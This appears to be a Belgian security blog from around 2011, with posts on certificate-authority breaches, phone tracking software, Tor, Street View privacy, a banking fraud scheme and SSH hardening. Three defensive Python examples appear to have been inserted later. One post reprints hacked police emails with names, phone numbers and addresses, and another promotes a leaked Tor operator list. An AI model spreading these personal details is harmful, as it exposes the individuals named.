• the best for 2012 and a better health for me now

    the last weeks I have been absent from this blog, but sometimes in your life - and this is a volunteer project for 7 years now for which I haven't earned a cent nor did it advance my career (more the opposite because it angered too many people :) ) - this is not to say that I am not open to interesting proposals if they can live with someone who speaks his mind and tells things as they might happen (and sometimes do :))

    but for the last weeks I have been sick just like last year and I had to keep my own health 'under control' and 'under observation' and be sure that I went to the doctor on time and had the right medication on time, because with my asthma a simple bronchitis can develop more easily into pneumonia and that can have greater consequences for me if it isn't found in time than for a 'normal' person (being in intensive care in the clinic for example - which I nearly was last year)

    but it is just as with security: you observe, you control, you keep the facts clean and without interpretation, you record the evolution, you eliminate and you learn the pattern. It is even more like security because here the attacks are hidden behind the continuous state of asthma and colds and so you have to learn to look behind the fog.

    with everything we have learnt (the doctor and me) after the two december attacks we are better prepared for next year, and as we were earlier this year in finding the right cause, maybe next year we will be even earlier.

    I will be back in a week or so when the medication is not so strong, because now I get tired quite quickly and I seem to hate working in front of a computer because it tires me and I can't keep myself concentrated long enough.

    so this blog ain't dead, but just 'on sickness leave'

    in the meantime I just want to say thanks to all the people who have updated their SSL certificates in the meantime, because I had announced in some back-channels that I would publish listings of bad or absent SSL certificates for big banks and online services

    I will get back on that in January, as with many other things in the wings

    one thing must be clear for 2012 - the time of niceties and compliance and waiting and understanding is over - it is 2012 you had enough time to clear up your mess and there is enough technology and knowledge on the market - even at affordable prices to secure your infrastructure and information.

    for the rest have a nice party tonight

  • how kpn-ssl can go down or survive

    The last time KPN stopped the production of SSL certificates, in November 2011, it took them 5 days to resume production. The fact was that someone discovered that one of the pages on their webservers had been defaced for 4 years. After an investigation by KPMG they decided that everything was clean and that they could resume business.

    Well, that seemed too quick.

    Now someone has decided that enough is enough and that they take everything offline and will only communicate when they are 100% sure. On one side that is a good decision, on the other hand communicating nothing will kill their business before it can restart, because we are talking about virtual trust.

    Now it seems that there are two problems.

    First a purely internal problem. Most of the business Diginotar did for the official government has been transferred very quickly to KPN (keeping it between the good old Dutch network) and that business also includes some very new markets (smartcards) for which they didn't seem to have all the necessary expertise and procedures yet. So they made a lot of mistakes in the beginning and when it became clear that mistakes were being made, they decided to audit every one of them again and revoke all the certificates (mostly for smartcards) that contained mistakes.

    This indicates that there is a management and a procedural verification problem in the internal process. It will be necessary for KPN to respond to that and to take whatever action and make whatever investment needed to adjust that (while keeping the controls as stringent as should be). 

    Secondly there is an external security problem. If you leave your external admin control page on an externally reachable server you are already taking a big risk (because admins could and should be working over a VPN connection to an internal management platform), but when there is no password (maybe there was one but the first hacker changed it - a possibility that has to be taken into account) there are three enormous problems of credibility.

    First it shows that there is no permanent security auditing and control, automatic and by really paranoid security people (trust no one except what you see with your own eyes). Otherwise such mistakes would have been seen by either of them. (use metasploit for automatic scanning)

    Secondly it shows that there is no permanent automatic and human monitoring and analysis of the logs. If that had been the case, the second hacker would have been discovered the moment he opened several confidential files that were stored on the database server but that a normal admin wouldn't have opened. He also saw that a first hacker had left some footprints on the server, so he discovered something the monitors didn't see.

    Thirdly it shows that the security policy inside the network is not paranoid enough for these times and hasn't even been upgraded considerably after the attacks on the other SSL providers (and the news by the Diginotar hacker that two other SSL providers were hacked inside out by him, without naming them). If you read this and you are a Dutch certificate provider and you have been offline for 5 days because of some old hack that has been discovered that you didn't know about, you should go nuts. And if you see that Diginotar goes broke, you should go through the roof, because you should know that if you are one of the two others the chances are great that you can be the next one and that you also can go broke. Maybe someone inside the company is mad as hell now and is mobilizing every penny he still has to get this act together as fast as possible... but it may be too late.
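As an added illustration of the two monitoring gaps just described (an admin console reachable from outside and without a password, and confidential file reads that nobody looked at), here is a small Python log auditor. It is example code written for this page, not anything from KPN, KPMG or this blog; the log lines, the management network 10.20.0.0/24, the admin path prefixes and the per-account file baselines are all constructed assumptions.

```python
import ipaddress
import re

# Constructed access-log lines (Common Log Format) for a certificate issuer's
# web tier. Not real data; 203.0.113.0/24 and 198.51.100.0/24 are documentation
# ranges. The third column is the authenticated user, "-" when there was none.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [10/Nov/2011:02:14:11 +0100] "GET /phpmyadmin/ HTTP/1.1" 200 5120',
    '10.20.0.5 - admin [10/Nov/2011:09:01:45 +0100] "GET /phpmyadmin/ HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Nov/2011:02:15:03 +0100] "GET /phpmyadmin/export.php?db=customers HTTP/1.1" 200 88210',
    '198.51.100.9 - - [10/Nov/2011:03:40:12 +0100] "GET /index.php HTTP/1.1" 200 2048',
    '198.51.100.9 - - [10/Nov/2011:03:41:50 +0100] "GET /admin/ HTTP/1.1" 401 512',
]

# Constructed file-access audit records (account, path) from the database host.
SAMPLE_FILE_AUDIT = [
    ("admin", "/var/www/html/index.php"),
    ("admin", "/srv/confidential/customer_networks.xls"),
    ("backup", "/srv/confidential/customer_networks.xls"),
]

# Assumptions for the example: where admins are supposed to come from (the VPN
# range), which paths are admin consoles, and which directories each account
# normally touches.
MANAGEMENT_NETS = [ipaddress.ip_network("10.20.0.0/24")]
ADMIN_PREFIXES = ("/phpmyadmin/", "/admin/")
FILE_BASELINE = {
    "admin": ("/var/www/",),
    "backup": ("/srv/confidential/", "/var/www/"),
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)


def parse_line(line):
    """Parse one Common Log Format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def is_management_ip(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in MANAGEMENT_NETS)


def is_admin_path(path):
    # Compare the path only, ignoring any query string.
    return path.split("?", 1)[0].startswith(ADMIN_PREFIXES)


def audit_access_log(lines):
    """Return (line_number, reason) for every admin page actually served (HTTP 200)
    to a client outside the management network or without an authenticated user.
    Responses like 401/403/302 are not flagged: the console refused the request."""
    findings = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            findings.append((n, "unparseable line"))
            continue
        if not is_admin_path(rec["path"]) or rec["status"] != 200:
            continue
        if not is_management_ip(rec["ip"]):
            findings.append((n, f"admin path {rec['path']} served to {rec['ip']} outside the management network"))
        if rec["user"] == "-":
            findings.append((n, f"admin path {rec['path']} served with no authenticated user"))
    return findings


def audit_file_access(records, baseline=FILE_BASELINE):
    """Flag reads outside the directories an account normally uses."""
    return [
        (user, path)
        for user, path in records
        if not any(path.startswith(prefix) for prefix in baseline.get(user, ()))
    ]


if __name__ == "__main__":
    for n, why in audit_access_log(SAMPLE_ACCESS_LOG):
        print(f"access log line {n}: {why}")
    for user, path in audit_file_access(SAMPLE_FILE_AUDIT):
        print(f"unexpected read by {user}: {path}")
```

The point of the two checks is that neither needs a signature: an admin console answering 200 to an unauthenticated request from the internet, or an account reading a directory it never reads, is visible in the logs the day it happens, provided someone (or something) is actually reading them.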

    If the KPN SSL business wants to survive they have to do the following three things, as Globalsign did

    1. Get online again and communicate about every step you have taken and every step you will be taking

    2. Get external auditors in and give them all the powers that need to be and let them only respond to the CEO and no one else. It is the business itself which is on the line and there should be no discussion about what to do next.

    3. Secure part by part of the business and go from the inside to the outside. Every part of the inside business that has been secured (or transferred to a secure environment) should go back to normal procedure (which means that they become active and that they deliver service - even if all passwords, rights, access, trusts, links and auditing have been reviewed from scratch or are revoked and are only re-activated after the re-securing process has been finished). The secured parts should be totally separated from the part of the infrastructure that has not been re-secured (also in backup, network links and so on).

    This is why leasing contracts for hardware or cloudcontracts for immediate new infrastructure are so important as standby contracts on which you can act swiftly.

    Every installation that would cost too much money to resecure or of which you can never be sure again because it was too deeply compromised, should simply be thrown away. The data (without the rights, code and access) should be migrated to an entirely fresh hardware platform.

    There should be a strict isolation between online public information and internal management, between business assets and management tools for external information, between confidential or secret information and public information.

    this is how globalsign did it

    all the other paths are risky and may FAIL

    just a last question: who decided in the firm that PHP was a platform that you could use without having permanent controls, checks and updates - because free and cheap software costs much more in security and maintenance. I like PHP-MySQL but it is not cheap in maintenance if you want to keep it safe and updated. You should use it because it is flexible, not because it looks cheap and easy (just like any other open source tool)

  • another dutch ssl certificate provider in trouble

    okay, you have to sit down and forget everything you have ever believed about internet security and remember that this is a service that should be at the highest level of security because its certificates create the trust on the internet that is used by all businesses and egov and all the other e-hyped things

    so we are talking about a service that you should trust completely because it gives you the certificates that all your users will trust to be sure that they are on your server and not one in Russia for example

    this is not a small firm, this is a subsidiary of KPN, one of the biggest Dutch ISPs and an official provider of official certificates for the Dutch government, even more so after the downfall of Diginotar

    It was already hacked once - somebody placed an online DDOS tool on one of its servers - in November 2011, but it went online again after a 'positive report' from KPMG (which proves that security auditing has to be done in real life and not on paper, globally and not locally, and permanently, not only after an incident)

    Now a hacker contacted the online webzine webwereld.nl to say that it wasn't difficult to penetrate their internal systems - even those with confidential information

    (are you sitting down) okay, their PHP admin webpage didn't have a password (yes, read that aloud to believe it)

    and the internal administrative password was 'easy to find'

    but the guy also said that he saw that he wasn't the first one who had penetrated the network and that he saw confidential information about confidential networks of governments and businesses (as you now also create certificates for servers on internal networks with confidential information) and which PCs they used, with sometimes insecure methods, to manage these certificates (good for targeted attacks)

    so the server went offline

    it is also clear that since September the number of certificates that have been revoked by the firm has risen dramatically. it is strange to see that when you have to do such a thing you don't ask yourself if there is something wrong, and that they didn't do some audits to find out

    virtual trust is absolute or relative and with certificates it has to be absolute

    the problem is that if it were the case that thousands of false certificates have been made or that someone had access to the systems, the trust in all their certificates would diminish and eventually the trust in their capability of providing such services would disappear, and thousands of certificates (many of them for official institutions who fled from Diginotar) would be in jeopardy - and this is not even a Dutch decision, it is a decision that the other operators on the internet may take independently (Microsoft, Firefox, Google etc...)

    even if they think that these guys aren't worth the trust because they don't know how to handle their business as it should be (they discovered a 4 year old hack in November, fixed it and then forgot that the main door to their database was open and that all the rest wasn't too secure either)

    some firms like Globalsign take such situations as an opportunity to review every detail of their operational and virtual business and they can restart

    if you can't do that (and put your money where your PR is) then you may lose that trust quickly

    because you can fool the people once (in november) but not every month....

  • iqcarrier (spy)ware : after the dust has fallen

    You could say that there is now a moment to get through the articles and debates and interest ourselves in a few concrete points on which further work is possible or necessary

    1. Logging and monitoring is necessary but one has to articulate clearly what is being sent from your computer or networked device to the operator or technical teams. One cannot expect a network operator to upgrade its network without having access to metrics. Those general metrics should be general and anonymized so that they can't be used for forensics.

    2. You can't have a helpdesk that can answer any possible technical question without having the possibility to get very detailed information about what happens on or with the networked device. This should be given by an already installed software and should be able to send test messages and other information - as long as the analysis is necessary - and should be deleted afterwards.

    3. Some jobs will need networked devices that are recording everything so that in case of a court order all the information linked to that case can be looked through. This is the case for American traders for example. But these people know that this is the case (and the most intelligent won't leave any digital footprints anyway)
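To make points 1 and 2 concrete, here is an added Python example (not code from Carrier IQ, any operator or this blog) of what "general and anonymized" network metrics can look like in practice, next to a diagnostic session that keeps detailed, identifiable records only for a bounded analysis window and is purged afterwards. The events, cell names, the k=5 suppression threshold and the session TTL are constructed assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed telemetry: per-device events a handset might report to an operator.
# Devices, cells and metric names are invented for this example.
EVENTS = (
    [{"device": f"dev-{i:02d}", "cell": "cell-A", "metric": "dropped_call"} for i in range(6)]
    + [{"device": "dev-00", "cell": "cell-A", "metric": "dropped_call"}]   # second event from one device
    + [{"device": f"dev-{i:02d}", "cell": "cell-A", "metric": "low_signal"} for i in range(5)]
    + [{"device": "dev-50", "cell": "cell-B", "metric": "dropped_call"},
       {"device": "dev-51", "cell": "cell-B", "metric": "dropped_call"}]
)

# Assumption: a (cell, metric) group is only reported when it is backed by at
# least this many distinct devices, so it can never point at one subscriber.
K_THRESHOLD = 5


def aggregate_metrics(events, k=K_THRESHOLD):
    """Network metrics without identifiers.

    Returns {(cell, metric): event_count}. Device identifiers are used only to
    count distinct contributors and never appear in the output; groups with
    fewer than k distinct devices are suppressed entirely.
    """
    counts = defaultdict(int)
    devices = defaultdict(set)
    for e in events:
        key = (e["cell"], e["metric"])
        counts[key] += 1
        devices[key].add(e["device"])
    return {key: n for key, n in counts.items() if len(devices[key]) >= k}


@dataclass
class DiagnosticSession:
    """Detailed diagnostics for one helpdesk case (point 2), kept for a bounded window."""
    device: str
    opened_at: float      # seconds on whatever clock the caller uses
    ttl_seconds: float
    records: list = field(default_factory=list)

    def add(self, record):
        self.records.append(record)

    def expired(self, now):
        return now >= self.opened_at + self.ttl_seconds


def purge_expired(sessions, now):
    """Drop every session whose analysis window has passed, records and all."""
    return [s for s in sessions if not s.expired(now)]


if __name__ == "__main__":
    for (cell, metric), n in sorted(aggregate_metrics(EVENTS).items()):
        print(f"{cell} {metric}: {n} events")
    s = DiagnosticSession("dev-00", opened_at=0.0, ttl_seconds=3600.0)
    s.add({"t": 12.0, "note": "constructed radio trace"})
    print("sessions after one hour:", purge_expired([s], now=3600.0))
```

With the constructed input, cell-B's two dropped calls disappear from the report because only two devices saw them, while cell-A's figures survive; the operator still learns where the network is weak, but nothing in the output names a device.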

    So even if we are comprehensive, some rules have been broken

    1. If there is a discussion about your software or your methods or procedures you should accept the debate and respond to it. It is clear from this incident that the firm is playing with its future by not doing so. Not only did they first try to silence the blogger, but they also didn't respond in detail to the allegations, even if others have shown with some technical analysis of the case that many of the presumptions were too general and too negative.

    2. The user of the networked device is never informed of the presence of this tool and what it actually does and where one can see what information is transferred and what is actually done with it and how it is managed.

    3. The user has no choice but to accept the tool(s) and the information. On a computer a software company or the OS (Microsoft in this case) asks you if they may receive information if the program crashes or encounters a problem and you have the possibility to opt out.

    4. Even if the software now doesn't really control and record every stroke you type (speaking seems gold) there is no guarantee that this software couldn't be adapted in our countries or by other agencies (with or without the knowledge of its user(s))

    5. It doesn't seem that there has been any consultation with any privacy organization or commissioner, and the general technical and legal terminology isn't enough to guarantee the privacy of each user under all circumstances.

     Some practical points to keep in mind

    1. Android is an open platform and a provider or phone reseller may do with it whatever it wishes. Maybe it is time to separate Android installations from network or phone resellers so that you could choose to install a newer version or one that is privacy-proof (from a CD). Maybe Android should also oblige adapted versions to detail online what was changed and why.

    This is the case for Apple devices up to Ios5 (which won't have this software) by  turning off "Diagnostics and Usage" in "Settings."

    2. The network device was during its analysis in debugger state which is different from the normal state of the device during the normal operation and use. Any device in debugger state will record everything that is happening on and with the device and send or record it as detailed as possible.

    3. Some of the information was not recorded by the software of Iqcarrier but by Android debugger tools which makes it necessary to index and control all the tools on the platforms that are recording user data.

    4. The software is an integrated part of some Android installations and removing it or installing an alternative ROM is in the present state dangerous for the stability of your device or software and could open other security problems. Secretive organisations and institutions will have to develop their own Android (I suppose the NSA would be capable of doing this) that can guarantee either full logging or no logging.

    5. This particular software isn't installed on Belgian phones or networks as far as we know but more research will be needed.

  • if you want links to free books, get them here before they also disappear

    scribd.com has decided that my 40.000 organized links to books and my 1000 documents were somewhat infringing on someone and so they threw me (again) away (with all the work)

    but that is the last time ....... no more uploading to scribd anymore

    except if they had the same rules for everyone (including their OWN staff) and a copyright monitoring software that is decent and would actually discover something worthwhile quickly enough....

    if you want to find the listings you can find them here with this Google


    for securitybooks (links that is) this is one

    http://www.scribd.com/collections/2801760/security2?page=39 (and before and afterwards)

    other collections (to help you search where)

    business - business2 - business3 - ecology - art - political - political2 - terrorism - international - international2 - fun and practical - fun and practical2 - history - history2 - filosophy - filosophy2 - security - security2 - science

    in all around 40.000 links

    this is also the reason why scribd.com will never be the YouTube for videos

    if youtube used the same discriminatory and stupid tactics it wouldn't have the userbase it has

    and to make their hypocritical attitude total, they aren't at all interested in promoting original stuff on their website or have any strategy to do so - a website that is a total mess with a tag system that is confusing

    content is king, the rest is stupidity (and they are throwing it away by the thousands)

  • what a political impact a stupid tweet can make

    Filip Dewinter
    Di Rupo prime minister! No way! Then I'll move to Namibia...

    Retweeted by and 100+ others

    so our belgian politicians have started tweeting throughout the day, trying to say things the smart way in 160 characters and looking sometimes very silly indeed

    this extreme right wing politician said a year and a half ago that he would go and live in Namibia if Elio Di Rupo became prime minister in Belgium

    Elio is prime minister in Belgium

    so,  now what ?

    think before you tweet :)

  • #belsecparty we are giving .be admins a bit more time (friday)

    we have contacted the cert that we will be publishing information about essential websites without ssl login and websites with ssl login where the configuration was sometimes so bad that it is better not to have ssl at all


    we have given the CERT access to the first stack of collections of sites

    as promised belsec 2.0 will be publishing more stuff like that from now on

    keeping it under the carpet has done no one any good


    remember there is a European directive coming our way with data breach fines

    so just setting it back won't be sufficient any more

  • exclusive : publication on pastebin of 2000 Tor admins (also Belgians) and advice

    there is nothing illegal with using Tor but it does indicate that you are taking some special measures to defend your privacy, and there is a lot of totally illegal stuff on Tor, and Tor is mainly being used by activists, spies and criminals - besides all the normal people who use it (but it is an element that would be mentioned in your profile)

    Tor is being maintained by volunteers who freely set up servers as entry points or as exit points. There has always been a lot of discussion about the control and security of those servers and what the maintainers of those servers are doing with all that information. In the beginning of Wikileaks there was a lot of discussion or debate about the source of all that material and some people thought that it was legitimate or stolen material that went through Tor.

    Tor is a system - a network that is under surveillance, and many people are busy all the time trying to hack or crack it (not for criminal but for espionage reasons), and that is why people should update their Tor software all the time (which is not the case if you look at the list). Maybe Tor should set an update check of the software before anyone can connect to the network, so it is sure that no users would enter with vulnerable software and compromise the privacy and security of others.

    around 2000 people are listed here, as they are probably users or admins of an entry or exit point, with an IP address and an email address, or because they have left information somewhere

    I hope there are no servers of your firm or organisation in it or that are also used for other services .....

    so the best advice would be to

    * use a fake or dedicated email address as contact for your Tor connections

    * never go in with your own ip address use a proxy or change your IP address immediately afterwards with your ISP

    this list is even more interesting for targeted attacks, because if you can't break the system, you can break nearly always the security of the individual installations and information


    but by looking a bit further there seems to be someone or a crew searching and researching everything they can find about Tor and every part of its installation and configuration (is an attack in preparation?) and publishing the data on pastebin (some with a time limit)

    time will tell - but you are warned

    by the way - intelligence and security-agencies should stop gazing at twitter all the time, the real stuff is happening in the paste-site world now - instantly before anyone on twitter even knows about it

  • for those who think that you can find a technical solution to copyright protection

    Researchers from the Ruhr University of Bochum’s Secure Hardware Group in Germany have cracked the copy protection system used by HDMI ports: Intel’s HDCP, or High-bandwidth Digital Content Protection. In addition to HDMI, HDCP is used to encrypt video signals transferred via DVI, DisplayPort and other connectors.


    “In 2010, an HDCP master key, which is intended to form the secret core element of the encryption system, appeared briefly on a website,” reads the official press release. “In response, the manufacturer Intel announced that HDCP still represented an effective protection component for digital entertainment, as the production of an HDCP-compatible chip using this master key would be highly complex and expensive.”


    Seemingly taking that as a challenge, the team accomplished the “inexpensive” man-in-the-middle attack by using Digilent’s Atlys Spartan-6 FPGA development board. It features a Xilinx Spartan-6 LX45 FPGA (field programmable gate array) in a 324-pin BGA package, two HDMI video input ports, two HDMI video output ports, a 10/100/1000 Ethernet jack, a RS232 serial port and more.

    You need a new business model, not a new encryption, DRM or whatever snooper you can think of.

  • Microsoft and botnets alerting : some thoughts

    Microsoft is the one firm in the world investing the most resources in tackling botnets and using any means to disrupt their networks (including getting them in US courts)

    Botnets are a complex problem that requires a multi-faceted global solution. As such, no one entity can solve the problem alone. Microsoft believes that voluntary efforts to combat botnets must include members of the entire ecosystem. In fact, the most interesting and effective solutions will come from the partnerships between different parts of the ecosystem.


    o We emphasize the need to disrupt and ultimately prevent botnets in the future. It is important not to simply build mechanisms by which botnet infections can be cleaned up very efficiently, in perpetuity. To do this, we must disrupt the botnet business models by simultaneously raising the attackers’ costs while lowering their gains.


    o We are supportive of efforts to notify customers of infected devices, but recognize the increased possibility for fraudulent notifications. There are two key aspects to making notifications resistant to fraud and effective to end-users regardless of the form they take. First is to establish a trusted communications channel, so that users can be assured they are getting notifications from a trusted entity, and not just another attacker trying to get them to put malware on their system. Second is to explain the problem and the solution in terms the user can understand and with steps they can easily follow.


    o We believe the most effective measure end users can take to stop botnet infections before they happen is to use the most current versions of operating systems, applications and security software available to them. Our recent Security Intelligence Report shows that each successive version of Windows has a lower infection rate than its predecessor.

    but even then I still think it is up to the ISPs to block the addresses of known botnet servers and to alert by trusted channels (why not the ISP bill for example) that that person could be infected and should install an antivirus or any other security measure

    and I still think that a security package should come automatically with your ISP subscription (even if you would be able to choose between different products).

  • European Commission wants to

    The EC is doing what national governments seem to be failing to do, and is asking for more power to deal with offending businesses. It is looking for fines of up to five per cent of annual turnover for breaches of privacy rules, according to a draft of the Data Protection Directive to be unveiled in the new year.


    Documents seen by the Financial Times suggest that the EC's proposals will also impose mandatory notifications for all companies within 24 hours of any data breach, as the institution looks to strengthen citizens' privacy.


    The document contains provisions for any organisation with more than 250 employees to appoint full-time staff dedicated to data protection, a requirement that is not enforced in all EU member states.

    at the privacy conference in Brussels this year the representative of the Commission had a hard time defending it against the lawyers and businessmen in the audience, but as one other person :) said

    it would make a world of difference for the security people in organisations and businesses if they could say: if you don't invest enough in security (normally 7 to 10% of your IT budget) then you risk paying a lot more if you get fined, and it would also cost you your image and reputation and trust because it would become public

    I think it is in the interest of any interested party to support this measure with any means possible, because the lobbyists will do everything in their power to get all the teeth out of the measures, and measures without teeth are meaningless.

    If those fines were used to subsidize the Privacy commissions in the respective member countries, then those would have a budget to pay firms to do real audits and to fine firms where it is clear that their audits are meaningless (Diginotar for example). Simply waving a report or some accreditation around wouldn't be sufficient.

    It would also mean that firms and organisations would have every interest in staying out of the online battles with antisec-anonymous, as it would - in time - lead to hacking and leaking of accounts for which they could be fined. As those attacks happen under the cover of DDOS attacks, it will be in the interest of hosters and ISPs to upgrade their DDOS defenses, as a commercial firm or institution shouldn't be hosted on a platform that can't defend them against DDOS attacks that would weaken their defenses and could lead to data leakages and fines. These fines would be more expensive than the cost of hosting your sites and applications with secure and DDOS-resilient infrastructure firms.

    It is also time to integrate security, privacy and performance (ddos) fully into any IT course worth that name.

    A last thought is that in Belgium we would need an IT security MBA that wouldn't be just a copy of international and US norms but would be built upon the Belgian and European law, norms and infrastructure while using the international knowledge and experience.

  • exclusive : Apple couldn't help FCCU with remote monitoring of Iphone finder

    Anonymous hacked the mailaccount of a cop who is a member of the special Occupy crackdown taskforce (as it is called) and published all its emails on torrent (and some on the web)

    it gives some credibility to the fact that Apple didn't know some intelligence services were hacking and cracking itunes and consorts to install monitor software

    this one is with a mail to our own FCCU.be

    • Oh Facebook!....  kthx for the tips :D

    • Just a thought,  I recently solved a missing (runaway) by getting Facebook login IP addresses.  The missing checked her Facebook account from her secret boyfriend’s residence.  You know that the younger generation can’t live without their social media.  Find out what your missing was in to; i.e. Facebook, MySpace, Tweeter or even email accounts.  They all store IP information.
    • Detective Jim Verlander  CFCE, CEECS
    • Baton Rouge Police Department
    • High Tech Support Unit
    • 4445 Plank Road, CIB - Annex
    • Baton Rouge, La. 70805
    • 225-389-8362 Office
    • 225-389-7865 Fax
    • jverlander@brgov.com
    • -----------------------------------------
    • How do you know the user doesn't already have it installed? Did you check the iTunes application list on their desktop machine?
    • It's possible it could already be installed and connected to their iCloud account, and if so, would be traceable. The carrier should also be able to provide location data if the device is on the network.
    • Jonathan
    • On Nov 3, 2011, at 8:02 AM, <tim.cools@fccu.be> wrote:
    • > Got my answer from Apple:
    • > ------------------------------------
    • > Dear Mr Cools,
    • > Unfortunately this is not possible. Apple has no means to remotely install and enable the 'Find my iPhone' facility.
    • > Regards, Martin Reed
    • > ------------------------------------
    • > Thx anyway.
    • > Tim COOLS
    • > Federal Judicial Police
    • > Federal Computer Crime Unit (FCCU)
    • > Notelaarsstraat 211 - 1000 Brussels, Belgium
    • > Tel +32 2 743 74 49
    • > Fax +32 2 743 74 19
    • > tim.cools@fccu.be
    • > From: Jonathan Zdziarski [mailto:jonathan@zdziarski.com]
    • > Sent: Thursday 3 November 2011 12:24
    • > Subject: Re: tracing an I-phone
    • > I'd think you should be able to subpoena that from Apple... As well as a subpoena to get location data from the cellular provider.
    • > Pardon teh Spellnig; Sent form my iPhone
    • > On Nov 3, 2011, at 7:14 AM, <tim.cools@fccu.be> wrote:
    • >     In a case of a missing person who has an I-phone,
    • >     Is there a possibility to trace that iphone without having the login details of the apple account of that missing person?
    • >     And without knowing that the app “find my Iphone” is installed …  
    • >     Thx, Tim  
    • >     Tim COOLs   
    • >     Federal Judicial Police
    • >     Federal Computer Crime Unit (FCCU)
    • >     Notelaarsstraat 211 - 1000 Brussels, Belgium
    • >     Tel +32 2 743 74 49
    • >     Fax +32 2 743 74 19
    • >     tim.cools@fccu.be

  • Google street view and selling your house

    so you want to sell  your house

    and people will use Google Street view to look at your house

    but what if

    * the street has been renovated (there are hundreds of km of streets that have been renovated throughout Belgium in the last years because the water infrastructure has to be renovated and separated at the same time)

    * you have renovated your house

    how do you let them know that the picture is old and that the street and your house is totally different from what is on the picture

    shouldn't Google put a date next to the picture just as an indication and alert

    because the watermark on the pictures says Google 2011 but that is false, it can't be 2011 because the street where I live is totally different from the street they have taken a picture from, so it can't be 2011

  • exclusive : Google Street View and your political privacy

    for some cities - Ostend among them - Google has taken the pictures a few months before an electoral campaign (I suppose it would be the one from 2010)

    while Google has undertaken enormous efforts in blurring the number plates and the faces of people, you can still find (for example in Ostend) who were supporters of Groen because they were quite early with their campaign

    it is quite amazing that they have not thought one minute of also blurring the political or religious affiliations of individual houses (and we are a democracy, imagine the same thing in Russia)

    no - you can say that it is public because you put that poster on your home - but that doesn't mean that at the time you were hanging that poster you knew it would be published on the net for years to come - imagine if you sell the house and the new home-owner is a member of a totally different party

    also, the names that are coupled to the houses are full of mistakes, and that is only among the few I know about

    so, no these things shouldn't be indexed in any way - even by Google

    game : find the Groen supporters in Ostend  :)

  • one very nice combination of spam, virus, ddos, keylogging, vishing and money mules

    The spam campaign is pretending to be legitimate e-mails from the National Automated Clearing House Association (NACHA), advising the user there was problem with the ACH transaction at their bank and it was not processed. Once they click on the link they are infected with the Zeus or Gameover malware, which is able to key log as well as steal their online banking credentials, defeating several forms of two factor authentication.


    After the accounts are compromised, the perpetrators conduct a Distributed Denial of Service (DDoS) attack on the financial institution. The belief is the DDoS is used to deflect attention from the wire transfers as well to make them unable to reverse the transactions (if found). A portion of the wire transfers (not all) are being transmitted directly to high-end jewelry stores, wherein the money mule comes to the actual store to pick up his $100K in jewels (or whatever dollar amount was wired).


    Investigation has shown the perpetrators contact the high-end jeweler requesting to purchase precious stones and high-end watches. The perpetrators advise they will wire the money to the jeweler’s account and someone will come to pick up the merchandise. The next day, a money mule arrives at the store, the jeweler confirms the money has been transferred or is listed as “pending” and releases the merchandise to the mule. Later on, the transaction is reversed or cancelled (if the financial institution caught the fraud in time) and the jeweler is out whatever jewels the money mule was able to obtain.


    so we have seen in the Anonymous campaigns that DDoS was used as a cover for break-ins and the stealing of accounts and documents. Here it is used as a cover for fraud. DDoS as a cover can become a method which will have an impact on security procedures: you won't concentrate on the DDoS but on all the other things that are happening at the same time.
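    As an added example (not from the post or from the report it summarises), the following Python sketch shows what "not concentrating on the DDoS" can look like in practice: wire transfers that fall inside a window around a DDoS alert are pulled out for manual review, and the large ones are held instead of being released on a "pending" status. The event records, field names and the thresholds are constructed assumptions.

```python
"""Correlate DDoS alerts with outgoing wire transfers.

Added example, not code from the original post or from any cited report.
When a DDoS starts, every outgoing wire inside a window around the alert
is flagged for review; the window opens *before* the alert because the
fraudulent wires described in the post are sent first and the DDoS follows
to hide them. All events below are constructed for illustration and the
field names are assumptions.
"""
from datetime import datetime, timedelta

# Constructed sample events (hypothetical institution, hypothetical values).
DDOS_ALERTS = [
    {"ts": "2011-12-20T09:05:00", "detail": "inbound SYN flood against online banking"},
]

WIRE_TRANSFERS = [
    {"id": "W-1001", "ts": "2011-12-20T07:40:00", "amount": 12000.0, "beneficiary": "Supplier BV"},
    {"id": "W-1002", "ts": "2011-12-20T09:12:00", "amount": 98000.0, "beneficiary": "Luxury Watches LLC"},
    {"id": "W-1003", "ts": "2011-12-20T09:30:00", "amount": 105000.0, "beneficiary": "Fine Jewels Inc"},
    {"id": "W-1004", "ts": "2011-12-20T15:00:00", "amount": 3500.0, "beneficiary": "Payroll"},
]


def _parse(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S")


def transfers_near_ddos(alerts, transfers, before=timedelta(hours=1), after=timedelta(hours=4)):
    """Return the transfers whose timestamp falls within
    [alert - before, alert + after] of any DDoS alert."""
    windows = [(_parse(a["ts"]) - before, _parse(a["ts"]) + after) for a in alerts]
    flagged = []
    for t in transfers:
        when = _parse(t["ts"])
        if any(start <= when <= end for start, end in windows):
            flagged.append(t)
    return flagged


def hold_queue(flagged, threshold=50000.0):
    """IDs of flagged transfers at or above the threshold: these go to a
    manual-release queue rather than being released while under attack."""
    return [t["id"] for t in flagged if t["amount"] >= threshold]


if __name__ == "__main__":
    near = transfers_near_ddos(DDOS_ALERTS, WIRE_TRANSFERS)
    print("review:", [t["id"] for t in near])
    print("hold:", hold_queue(near))
```

    The window and the threshold are policy choices; the point is that the DDoS alert becomes a trigger for looking at the payment flow, not the only thing the operations team looks at.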

  • more ssh attacks coming - how to protect yourself

    some tips from the internet storm center

    Some Defensive Tips (Thanks Swa)


    - Never allow root to log in, no matter what: always log in as a regular user and then use su/sudo as needed.
    - Change the port number: why go stand in the line of fire?
    - Disallow password authentication (use keys)


    In addition to the above, you should also consider using TCP Wrappers [2] with the SSH service to limit access to only those addresses that need access.


    Another application that can also help protect your SSH service is fail2ban [1]: it bans IP addresses that produce too many password failures, by updating the firewall rules to reject the address.


    Have you been seeing similar activity?


    [1] http://www.fail2ban.org/wiki/index.php/Main_Page


    [2] ftp://ftp.porcupine.org/pub/security/index.html
